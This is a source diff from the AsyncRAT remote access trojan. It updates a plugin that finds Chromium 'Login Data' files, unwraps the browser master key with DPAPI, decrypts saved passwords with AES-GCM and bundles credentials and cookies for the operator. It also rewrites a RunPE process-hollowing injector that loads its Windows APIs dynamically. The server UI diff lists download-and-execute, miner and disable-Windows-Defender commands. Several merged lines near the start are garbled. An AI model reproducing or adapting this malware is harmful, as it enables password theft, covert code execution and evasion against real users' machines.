DirectoryPath + @"\Login Data"
};
if (Directory.Exists(DirectoryPath))
{
foreach (string dir in Directory.GetDirectories(DirectoryPath))
{
if (dir.Contains("Profile"))
loginDataFiles.Add(dir + @"\Login Data");
}
}
return loginDataFiles;
}
public static string DecryptWithKey(byte[] encryptedData, byte[] MasterKey)
{
byte[] iv = new byte[] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; // IV 12 bytes
//trim first 3 bytes(signature "v10") and take 12 bytes after signature.
Array.Copy(encryptedData, 3, iv, 0, 12);
try try
{ {
Chromium.DATA_BLOB data_BLOB = default(Chromium.DATA_BLOB); //encryptedData without IV
Chromium.DATA_BLOB data_BLOB2 = default(Chromium.DATA_BLOB); byte[] Buffer = new byte[encryptedData.Length - 15];
GCHandle gchandle = GCHandle.Alloc(Datas, GCHandleType.Pinned); Array.Copy(encryptedData, 15, Buffer, 0, encryptedData.Length - 15);
Chromium.DATA_BLOB data_BLOB3;
data_BLOB3.pbData = gchandle.AddrOfPinnedObject(); byte[] tag = new byte[16]; //AuthTag
data_BLOB3.cbData = Datas.Length; byte[] data = new byte[Buffer.Length - tag.Length]; //Encrypted Data
gchandle.Free();
Chromium.CRYPTPROTECT_PROMPTSTRUCT cryptprotect_PROMPTSTRUCT = default(Chromium.CRYPTPROTECT_PROMPTSTRUCT); //Last 16 bytes for tag
string empty = string.Empty; Array.Copy(Buffer, Buffer.Length - 16, tag, 0, 16);
Chromium.CryptUnprotectData(ref data_BLOB3, null, ref data_BLOB2, (IntPtr)0, ref cryptprotect_PROMPTSTRUCT, (Chromium.CryptProtectFlags)0, ref data_BLOB);
byte[] array = new byte[data_BLOB.cbData + 1]; //encrypted password
Marshal.Copy(data_BLOB.pbData, array, 0, data_BLOB.cbData); Array.Copy(Buffer, 0, data, 0, Buffer.Length - tag.Length);
string @string = Encoding.UTF8.GetString(array);
result = @string.Substring(0, @string.Length - 1); AesGcm aesDecryptor = new AesGcm();
} var result = Encoding.UTF8.GetString(aesDecryptor.Decrypt(MasterKey, iv, null, data, tag));
catch
{
result = "";
}
return result; return result;
} }
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
return null;
}
}
public static byte[] GetMasterKey(string LocalStateFolder)
{
//Key saved in Local State file
string filePath = LocalStateFolder + @"\Local State";
byte[] masterKey = new byte[] { };
if (File.Exists(filePath) == false)
return null;
//Get key with regex.
var pattern = new System.Text.RegularExpressions.Regex("\"encrypted_key\":\"(.*?)\"", System.Text.RegularExpressions.RegexOptions.Compiled).Matches(File.ReadAllText(filePath));
foreach (System.Text.RegularExpressions.Match prof in pattern)
{
if (prof.Success)
masterKey = Convert.FromBase64String((prof.Groups[1].Value)); //Decode base64
}
//Trim first 5 bytes. Its signature "DPAPI"
byte[] temp = new byte[masterKey.Length - 5];
Array.Copy(masterKey, 5, temp, 0, masterKey.Length - 5);
try
{
return ProtectedData.Unprotect(temp, null, DataProtectionScope.CurrentUser);
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
return null;
}
}
public static string Decrypt(string encryptedData)
{
if (encryptedData == null || encryptedData.Length == 0)
return null;
try
{
return Encoding.UTF8.GetString(ProtectedData.Unprotect(Encoding.Default.GetBytes(encryptedData), null, DataProtectionScope.CurrentUser));
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
return null;
}
}
private string[] GetAppDataFolders() private string[] GetAppDataFolders()
{ {
@ -279,52 +438,5 @@ namespace Plugin.Browsers.Chromium
} }
return list.ToArray(); return list.ToArray();
} }
[DllImport("Crypt32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CryptProtectData(ref Chromium.DATA_BLOB pDataIn, string szDataDescr, ref Chromium.DATA_BLOB pOptionalEntropy, IntPtr pvReserved, ref Chromium.CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, Chromium.CryptProtectFlags dwFlags, ref Chromium.DATA_BLOB pDataOut);
[DllImport("Crypt32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CryptUnprotectData(ref Chromium.DATA_BLOB pDataIn, StringBuilder szDataDescr, ref Chromium.DATA_BLOB pOptionalEntropy, IntPtr pvReserved, ref Chromium.CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, Chromium.CryptProtectFlags dwFlags, ref Chromium.DATA_BLOB pDataOut);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct DATA_BLOB
{
public int cbData;
public IntPtr pbData;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct CRYPTPROTECT_PROMPTSTRUCT
{
public int cbSize;
public Chromium.CryptProtectPromptFlags dwPromptFlags;
public IntPtr hwndApp;
public string szPrompt;
}
[Flags]
private enum CryptProtectPromptFlags
{
CRYPTPROTECT_PROMPT_ON_UNPROTECT = 1,
CRYPTPROTECT_PROMPT_ON_PROTECT = 2
}
[Flags]
private enum CryptProtectFlags
{
CRYPTPROTECT_UI_FORBIDDEN = 1,
CRYPTPROTECT_LOCAL_MACHINE = 4,
CRYPTPROTECT_CRED_SYNC = 8,
CRYPTPROTECT_AUDIT = 16,
CRYPTPROTECT_NO_RECOVERY = 32,
CRYPTPROTECT_VERIFY_PROTECTION = 64
}
} }
} }

4
AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs
View File

@ -12,11 +12,11 @@ namespace Plugin
{ {
StringBuilder Credentials = new StringBuilder(); StringBuilder Credentials = new StringBuilder();
new Browsers.Firefox.Firefox().CredRecovery(Credentials); new Browsers.Firefox.Firefox().CredRecovery(Credentials);
new Browsers.Chromium.Chromium().Recovery(Credentials); Browsers.Chromium.Chromium.Recovery(Credentials);
StringBuilder Cookies = new StringBuilder(); StringBuilder Cookies = new StringBuilder();
new Browsers.Firefox.Firefox().CookiesRecovery(Cookies); new Browsers.Firefox.Firefox().CookiesRecovery(Cookies);
new Browsers.Chromium.Chromium().CookiesRecovery(Cookies); //new Browsers.Chromium.Chromium().CookiesRecovery(Cookies);
MsgPack msgpack = new MsgPack(); MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "recoveryPassword"; msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";

4
AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj
View File

@ -48,6 +48,7 @@
<HintPath>..\..\..\packages\System.Data.SQLite.Core.1.0.111.0\lib\net40\System.Data.SQLite.dll</HintPath> <HintPath>..\..\..\packages\System.Data.SQLite.Core.1.0.111.0\lib\net40\System.Data.SQLite.dll</HintPath>
<Private>True</Private> <Private>True</Private>
</Reference> </Reference>
<Reference Include="System.Security" />
<Reference Include="System.Xml.Linq" /> <Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" /> <Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" /> <Reference Include="Microsoft.CSharp" />
@ -55,6 +56,9 @@
<Reference Include="System.Xml" /> <Reference Include="System.Xml" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<Compile Include="Browsers\Chromium\Account.cs" />
<Compile Include="Browsers\Chromium\AesGcm.cs" />
<Compile Include="Browsers\Chromium\BCrypt.cs" />
<Compile Include="Browsers\Chromium\Chromium.cs" /> <Compile Include="Browsers\Chromium\Chromium.cs" />
<Compile Include="Browsers\Chromium\ChromiumCookies.cs" /> <Compile Include="Browsers\Chromium\ChromiumCookies.cs" />
<Compile Include="Browsers\CredentialModel.cs" /> <Compile Include="Browsers\CredentialModel.cs" />

2
AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs
View File

@ -88,7 +88,7 @@ namespace Plugin.Handler
{ {
try try
{ {
RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer), "", true); RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer));
} }
catch (Exception ex) catch (Exception ex)
{ {

10
AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs
View File

@ -35,11 +35,11 @@ namespace Plugin
break; break;
} }
case "xmr": //case "xmr":
{ // {
new HandleMiner(unpack_msgpack); // new HandleMiner(unpack_msgpack);
break; // break;
} // }
} }
} }
catch (Exception ex) catch (Exception ex)

214
AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs
View File

@ -10,29 +10,50 @@ namespace Plugin
{ {
public static class RunPE public static class RunPE
{ {
//github.com/Artiist/RunPE-Process-Protection/blob/master/RunPE.cs
[DllImport("kernel32.dll", EntryPoint = "CreateProcess", CharSet = CharSet.Unicode), SuppressUnmanagedCodeSecurity] #region API delegate
private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation); private delegate int DelegateResumeThread(IntPtr handle);
[DllImport("kernel32.dll", EntryPoint = "GetThreadContext"), SuppressUnmanagedCodeSecurity] private delegate bool DelegateWow64SetThreadContext(IntPtr thread, int[] context);
private static extern bool GetThreadContext(IntPtr thread, int[] context); private delegate bool DelegateSetThreadContext(IntPtr thread, int[] context);
[DllImport("kernel32.dll", EntryPoint = "Wow64GetThreadContext"), SuppressUnmanagedCodeSecurity] private delegate bool DelegateWow64GetThreadContext(IntPtr thread, int[] context);
private static extern bool Wow64GetThreadContext(IntPtr thread, int[] context); private delegate bool DelegateGetThreadContext(IntPtr thread, int[] context);
[DllImport("kernel32.dll", EntryPoint = "SetThreadContext"), SuppressUnmanagedCodeSecurity] private delegate int DelegateVirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
private static extern bool SetThreadContext(IntPtr thread, int[] context); private delegate bool DelegateWriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
[DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext"), SuppressUnmanagedCodeSecurity] private delegate bool DelegateReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
private static extern bool Wow64SetThreadContext(IntPtr thread, int[] context); private delegate int DelegateZwUnmapViewOfSection(IntPtr process, int baseAddress);
[DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory"), SuppressUnmanagedCodeSecurity] private delegate bool DelegateCreateProcessA(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes,
private static extern bool ReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead); bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);
[DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory"), SuppressUnmanagedCodeSecurity] #endregion
private static extern bool WriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
[DllImport("ntdll.dll", EntryPoint = "NtUnmapViewOfSection"), SuppressUnmanagedCodeSecurity]
private static extern int NtUnmapViewOfSection(IntPtr process, int baseAddress); #region API
[DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx"), SuppressUnmanagedCodeSecurity] private static readonly DelegateResumeThread ResumeThread = LoadApi<DelegateResumeThread>("kernel32", "ResumeThread");
private static extern int VirtualAllocEx(IntPtr handle, int address, int length, int type, int protect); private static readonly DelegateWow64SetThreadContext Wow64SetThreadContext = LoadApi<DelegateWow64SetThreadContext>("kernel32", "Wow64SetThreadContext");
[DllImport("kernel32.dll", EntryPoint = "ResumeThread"), SuppressUnmanagedCodeSecurity] private static readonly DelegateSetThreadContext SetThreadContext = LoadApi<DelegateSetThreadContext>("kernel32", "SetThreadContext");
private static extern int ResumeThread(IntPtr handle); private static readonly DelegateWow64GetThreadContext Wow64GetThreadContext = LoadApi<DelegateWow64GetThreadContext>("kernel32", "Wow64GetThreadContext");
[StructLayout(LayoutKind.Sequential, Pack = 2 - 1)] private static readonly DelegateGetThreadContext GetThreadContext = LoadApi<DelegateGetThreadContext>("kernel32", "GetThreadContext");
private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi<DelegateVirtualAllocEx>("kernel32", "VirtualAllocEx");
private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi<DelegateWriteProcessMemory>("kernel32", "WriteProcessMemory");
private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi<DelegateReadProcessMemory>("kernel32", "ReadProcessMemory");
private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi<DelegateZwUnmapViewOfSection>("ntdll", "ZwUnmapViewOfSection");
private static readonly DelegateCreateProcessA CreateProcessA = LoadApi<DelegateCreateProcessA>("kernel32", "CreateProcessA");
#endregion
#region CreateAPI
[DllImport("kernel32", SetLastError = true)]
private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
private static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
private static CreateApi LoadApi<CreateApi>(string name, string method)
{
return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
}
#endregion
#region Structure
[StructLayout(LayoutKind.Sequential, Pack = 0x1)]
private struct ProcessInformation private struct ProcessInformation
{ {
public readonly IntPtr ProcessHandle; public readonly IntPtr ProcessHandle;
@ -40,79 +61,75 @@ namespace Plugin
public readonly uint ProcessId; public readonly uint ProcessId;
private readonly uint ThreadId; private readonly uint ThreadId;
} }
[StructLayout(LayoutKind.Sequential, Pack = 3 - 2)] [StructLayout(LayoutKind.Sequential, Pack = 0x1)]
private struct StartupInformation private struct StartupInformation
{ {
public uint Size; public uint Size;
private readonly string Reserved1; private readonly string Reserved1;
private readonly string Desktop; private readonly string Desktop;
private readonly string Title; private readonly string Title;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 18 + 18)] private readonly byte[] Misc; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 0x24)] private readonly byte[] Misc;
private readonly IntPtr Reserved2; private readonly IntPtr Reserved2;
private readonly IntPtr StdInput; private readonly IntPtr StdInput;
private readonly IntPtr StdOutput; private readonly IntPtr StdOutput;
private readonly IntPtr StdError; private readonly IntPtr StdError;
} }
#endregion
public static bool Run(string path, byte[] data, string args, bool protect)
{
for (int I = 1; I <= 5; I++)
if (HandleRun(path, data, args, protect)) return true;
return false;
}
private static bool HandleRun(string path, byte[] data, string args, bool protect) public static void Run(string path, byte[] payload)
{ {
int readWrite = 0; for (int i = 0; i < 5; i++)
string quotedPath = args; {
int readWrite = 0x0;
StartupInformation si = new StartupInformation(); StartupInformation si = new StartupInformation();
ProcessInformation pi = new ProcessInformation(); ProcessInformation pi = new ProcessInformation();
si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation))); si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation)));
try try
{ {
if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 0x00000004u | 0x08000000u, IntPtr.Zero, null, ref si, ref pi)) throw new Exception(); if (!CreateProcessA(path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 0x00000004 | 0x08000000, IntPtr.Zero, null, ref si, ref pi)) throw new Exception();
int fileAddress = BitConverter.ToInt32(data, 120 / 2); int fileAddress = BitConverter.ToInt32(payload, 0x3C);
int imageBase = BitConverter.ToInt32(data, fileAddress + 26 + 26); int imageBase = BitConverter.ToInt32(payload, fileAddress + 0x34);
int[] context = new int[179]; int[] context = new int[0xB3];
context[0] = 32769 + 32769; context[0x0] = 0x10002;
if (IntPtr.Size == 8 / 2) if (IntPtr.Size == 0x4)
{ if (!GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); } { if (!GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
else else
{ if (!Wow64GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); } { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
int ebx = context[41]; int ebx = context[0x29];
int baseAddress = 1 - 1; int baseAddress = 0x0;
if (!ReadProcessMemory(pi.ProcessHandle, ebx + 4 + 4, ref baseAddress, 2 + 2, ref readWrite)) throw new Exception(); if (!ReadProcessMemory(pi.ProcessHandle, ebx + 0x8, ref baseAddress, 0x4, ref readWrite)) throw new Exception();
if (imageBase == baseAddress) if (imageBase == baseAddress)
if (NtUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 1 - 1) throw new Exception(); if (ZwUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0x0) throw new Exception();
int sizeOfImage = BitConverter.ToInt32(data, fileAddress + 160 / 2); int sizeOfImage = BitConverter.ToInt32(payload, fileAddress + 0x50);
int sizeOfHeaders = BitConverter.ToInt32(data, fileAddress + 42 + 42); int sizeOfHeaders = BitConverter.ToInt32(payload, fileAddress + 0x54);
bool allowOverride = false; bool allowOverride = false;
int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 6144 + 6144, 32 + 32); int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 0x3000, 0x40);
if (newImageBase == 0) throw new Exception(); if (newImageBase == 0x0) throw new Exception();
if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, data, sizeOfHeaders, ref readWrite)) throw new Exception(); if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref readWrite)) throw new Exception();
int sectionOffset = fileAddress + 124 * 2; int sectionOffset = fileAddress + 0xF8;
short numberOfSections = BitConverter.ToInt16(data, fileAddress + 3 + 3); short numberOfSections = BitConverter.ToInt16(payload, fileAddress + 0x6);
for (int I = 1 - 1; I < numberOfSections; I++) for (int I = 0; I < numberOfSections; I++)
{ {
int virtualAddress = BitConverter.ToInt32(data, sectionOffset + 6 + 6); int virtualAddress = BitConverter.ToInt32(payload, sectionOffset + 0xC);
int sizeOfRawData = BitConverter.ToInt32(data, sectionOffset + 8 + 8); int sizeOfRawData = BitConverter.ToInt32(payload, sectionOffset + 0x10);
int pointerToRawData = BitConverter.ToInt32(data, sectionOffset + 40 / 2); int pointerToRawData = BitConverter.ToInt32(payload, sectionOffset + 0x14);
if (sizeOfRawData != 1 - 1) if (sizeOfRawData != 0x0)
{ {
byte[] sectionData = new byte[sizeOfRawData]; byte[] sectionData = new byte[sizeOfRawData];
Buffer.BlockCopy(data, pointerToRawData, sectionData, 2 - 2, sectionData.Length); Buffer.BlockCopy(payload, pointerToRawData, sectionData, 0x0, sectionData.Length);
if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception(); if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception();
} }
sectionOffset += 120 / 3; sectionOffset += 0x28;
} }
byte[] pointerData = BitConverter.GetBytes(newImageBase); byte[] pointerData = BitConverter.GetBytes(newImageBase);
if (!WriteProcessMemory(pi.ProcessHandle, ebx + 16 / 2, pointerData, 2 * 2, ref readWrite)) throw new Exception(); if (!WriteProcessMemory(pi.ProcessHandle, ebx + 0x8, pointerData, 0x4, ref readWrite)) throw new Exception();
int addressOfEntryPoint = BitConverter.ToInt32(data, fileAddress + 80 / 2); int addressOfEntryPoint = BitConverter.ToInt32(payload, fileAddress + 0x28);
if (allowOverride) newImageBase = imageBase; if (allowOverride) newImageBase = imageBase;
context[22 + 22] = newImageBase + addressOfEntryPoint; context[0x2C] = newImageBase + addressOfEntryPoint;
if (IntPtr.Size == 2 + 2) if (IntPtr.Size == 0x4)
{ {
if (!SetThreadContext(pi.ThreadHandle, context)) throw new Exception(); if (!SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
} }
@ -121,85 +138,14 @@ namespace Plugin
if (!Wow64SetThreadContext(pi.ThreadHandle, context)) throw new Exception(); if (!Wow64SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
} }
if (ResumeThread(pi.ThreadHandle) == -1) throw new Exception(); if (ResumeThread(pi.ThreadHandle) == -1) throw new Exception();
if (protect) Protect(pi.ProcessHandle);
} }
catch catch
{ {
Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill(); Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
return false; continue;
} }
return true; break;
} }
[DllImport("advapi32.dll", SetLastError = true)]
private static extern bool GetKernelObjectSecurity(IntPtr Handle, int securityInformation, [Out] byte[] pSecurityDescriptor, uint nLength, ref uint lpnLengthNeeded);
[DllImport("advapi32.dll", SetLastError = true)]
private static extern bool SetKernelObjectSecurity(IntPtr Handle, int securityInformation, [In] byte[] pSecurityDescriptor);
private static void SetProcessSecurityDescriptor(IntPtr processHandle, RawSecurityDescriptor rawSecurityDescriptor)
{
byte[] array = new byte[checked(rawSecurityDescriptor.BinaryLength - 1 + 1 - 1 + 1)];
rawSecurityDescriptor.GetBinaryForm(array, 0);
bool flag = !SetKernelObjectSecurity(processHandle, 4, array);
if (flag)
{
throw new Win32Exception();
}
}
private static T InlineAssignHelper<T>(ref T target, T value)
{
target = value;
return value;
}
private static RawSecurityDescriptor GetProcessSecurityDescriptor(IntPtr processHandle)
{
byte[] array = new byte[0];
uint bufferSize = new uint();
GetKernelObjectSecurity(processHandle, 4, array, 0u, ref bufferSize);
if (bufferSize < 0 || bufferSize > short.MaxValue)
{
throw new Win32Exception();
}
bool cdt = !GetKernelObjectSecurity(processHandle, 4, InlineAssignHelper<byte[]>(ref array, new byte[checked((int)(unchecked((ulong)bufferSize) - 1UL) + 1 - 1 + 1)]), bufferSize, ref bufferSize);
if (cdt)
{
throw new Win32Exception();
}
return new RawSecurityDescriptor(array, 0);
}
private static void Protect(IntPtr processHandle)
{
RawSecurityDescriptor rawSecurityDescriptor = GetProcessSecurityDescriptor(processHandle);
rawSecurityDescriptor.DiscretionaryAcl.InsertAce(0, new CommonAce(AceFlags.None, AceQualifier.AccessDenied, 987135, new SecurityIdentifier(WellKnownSidType.WorldSid, null), false, null));
SetProcessSecurityDescriptor(processHandle, rawSecurityDescriptor);
}
private enum ProcessAccessRights
{
DELETE = 65536,
ITE_OWNER = 524288,
PROCESS_ALL_ACCESS = 987135,
PROCESS_CREATE_PROCESS = 128,
PROCESS_CREATE_THREAD = 2,
PROCESS_DUP_HANDLE = 64,
PROCESS_QUERY_INFORMATION = 1024,
PROCESS_QUERY_LIMITED_INFORMATION = 4096,
PROCESS_SET_INFORMATION = 512,
PROCESS_SET_QUOTA = 256,
PROCESS_SUSPEND_RESUME = 2048,
PROCESS_TERMINATE = 1,
PROCESS_VM_OPERATION = 8,
PROCESS_VM_READ = 16,
PROCESS_VM_WRITE = 32,
READ_CONTROL = 131072,
STANDARD_RIGHTS_REQUIRED = 983040,
SYNCHRONIZE = 256,
WRITE_DAC = 262144
} }
} }

1
AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj
View File

@ -45,7 +45,6 @@
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<Compile Include="Connection.cs" /> <Compile Include="Connection.cs" />
<Compile Include="Handler\HandleMiner.cs" />
<Compile Include="Handler\HandleSendTo.cs" /> <Compile Include="Handler\HandleSendTo.cs" />
<Compile Include="Handler\HandleUninstall.cs" /> <Compile Include="Handler\HandleUninstall.cs" />
<Compile Include="MessagePack\BytesTools.cs" /> <Compile Include="MessagePack\BytesTools.cs" />

689
AsyncRAT-C#/Server/Forms/Form1.Designer.cs generated
View File

@ -41,10 +41,45 @@
this.lv_admin = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_admin = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_av = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_av = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_ping = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_ping = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_prefor = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_act = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuClient = new System.Windows.Forms.ContextMenuStrip(this.components); this.contextMenuClient = new System.Windows.Forms.ContextMenuStrip(this.components);
this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator2 = new System.Windows.Forms.ToolStripSeparator(); this.toolStripSeparator2 = new System.Windows.Forms.ToolStripSeparator();
this.toolStripSeparator1 = new System.Windows.Forms.ToolStripSeparator();
this.toolStripSeparator5 = new System.Windows.Forms.ToolStripSeparator();
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel();
this.ping = new System.Windows.Forms.Timer(this.components);
this.UpdateUI = new System.Windows.Forms.Timer(this.components);
this.tabControl1 = new System.Windows.Forms.TabControl();
this.tabPage1 = new System.Windows.Forms.TabPage();
this.tabPage2 = new System.Windows.Forms.TabPage();
this.listView2 = new System.Windows.Forms.ListView();
this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuLogs = new System.Windows.Forms.ContextMenuStrip(this.components);
this.cLEARToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.tabPage3 = new System.Windows.Forms.TabPage();
this.listView3 = new System.Windows.Forms.ListView();
this.contextMenuThumbnail = new System.Windows.Forms.ContextMenuStrip(this.components);
this.ThumbnailImageList = new System.Windows.Forms.ImageList(this.components);
this.tabPage4 = new System.Windows.Forms.TabPage();
this.listView4 = new System.Windows.Forms.ListView();
this.columnHeader4 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.columnHeader5 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuTasks = new System.Windows.Forms.ContextMenuStrip(this.components);
this.pASSWORDRECOVERYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.downloadAndExecuteToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.sENDFILETOMEMORYToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.minerToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.uPDATEToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator4 = new System.Windows.Forms.ToolStripSeparator();
this.dELETETASKToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.performanceCounter1 = new System.Diagnostics.PerformanceCounter();
this.performanceCounter2 = new System.Diagnostics.PerformanceCounter();
this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
this.TimerTask = new System.Windows.Forms.Timer(this.components);
this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.sENDFILEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.sENDFILEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.tOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.tOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.tODISKToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.tODISKToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
@ -77,6 +112,7 @@
this.runToolStripMenuItem2 = new System.Windows.Forms.ToolStripMenuItem(); this.runToolStripMenuItem2 = new System.Windows.Forms.ToolStripMenuItem();
this.stopToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.stopToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.disableWindowsDefenderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.disableWindowsDefenderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.setWallpaperToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.systemToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.systemToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.clientToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.clientToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.closeToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.closeToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
@ -89,46 +125,11 @@
this.logoffToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.logoffToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.restartToolStripMenuItem3 = new System.Windows.Forms.ToolStripMenuItem(); this.restartToolStripMenuItem3 = new System.Windows.Forms.ToolStripMenuItem();
this.shutdownToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.shutdownToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator1 = new System.Windows.Forms.ToolStripSeparator();
this.serverToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.serverToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
